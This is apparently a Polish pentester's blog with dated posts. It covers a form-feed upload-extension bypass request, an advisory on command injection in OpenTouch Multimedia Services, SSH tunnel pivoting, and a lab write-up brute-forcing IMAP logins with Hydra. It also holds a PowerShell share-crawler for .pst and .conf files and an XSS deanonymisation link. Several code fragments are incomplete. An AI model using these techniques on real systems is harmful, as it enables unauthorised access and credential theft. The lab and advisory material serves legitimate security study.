piątek, 3 lipca 2020

Form Feed U+000C

 Znak, który czasami pozwala wyeskejpowac rozszerzenie plików w apkach webowych - •
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close

Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf


HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 08:09:26 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding,User-Agent
Content-Length: 21
Content-Type: text/html


wtorek, 5 maja 2020

Alcatel-Lucent Security Advisory: CVE-2020-1179 (RCE)

OTMS remote code execution

I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.

Description of the vulnerability

Cgi script vmconstruct.cgi is vulnerable to shell command injection attacks through HTTP POST request. An attacker with an OT administrator cookie can inject arbitrary OS command using semicolon (;) character in the web request.


OS command injection vulnerabilities can lead to elevate shell access on OT server for the attacker.

Reference: CVE-2020-11794
Date: April 15th, 2020
Risk: High
Impact: Get access
Attack expertise: Skilled, Administrative user
Attack requirements: Remote
CVSS score: 8.0 (HIGH)

czwartek, 26 marca 2020

SSH socks proxy beetwen Lan1 and Lan2

Linux in Lan1: ssh -R 5555:localhost:22 w4cky@VPS_IP -p 8080
Linux in Lan2: SSH -L 5000: w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -D 1234 root@localhost -p 5000

niedziela, 22 marca 2020

Lab Pentestit 14 - writeup

  1. Crack password for mail
# cat logins_mail.txt                                                                                                                        

hydra -L logins_mail.txt  -P /tmp/1 imap:// -t 60 -f  -I                                                                             
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://


[143][imap] host:   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12

telnet imap                                                         
Connected to
Escape character is '^]'.
a1 LOGIN support@test.lab PASSWORD
a1 OK
telnet> quit
Connection closed.

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.

poniedziałek, 27 stycznia 2020

Turbo intruder sample code

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,

    for i in range(1000):


def handleResponse(req, interesting):
    if "cos" in req.response:

wtorek, 21 stycznia 2020

Przeszukiwanie plików z dostępem do odczytu na zasobach - powershell


$FILE_TYPES = "*.pst, *.conf"

net view \\$REMOTE_HOST\ |
ForEach-Object {
    $path = [regex]::match($_, '(.*)       Dysk').Groups[1].Value.Trim()

    if ($path -ne "") {
        Write-Host ("### PATH: " + $path)
        Get-ChildItem -Path \\$REMOTE_HOST\$path -Include $FILE_TYPES -Recurse -ErrorAction Ignore |
        ForEach-Object {
            Try {
                Write-Host $_.FullName
            Catch {
                #Write-Host ("Niet: " + $_.FullName)

//Autor: hagier

poniedziałek, 25 listopada 2019

XSS w praktyce - deanomizacja

Natrafiłem na ciekawy artykuł pokazujący w praktyce jak przebiega skuteczny atak XSS.  Artykuł pozakazuje kilka ciekawych technik (jak np wykradanie danych z auto uzupełnionych formularzy). Całość pokazuje w jaki sposób zwykły XSS zdeanonimizował administratora pewnej strony internetowej.

LINK: https://m417z.com/The-De-anonymization-of-the-Technion-Confessions-Admin/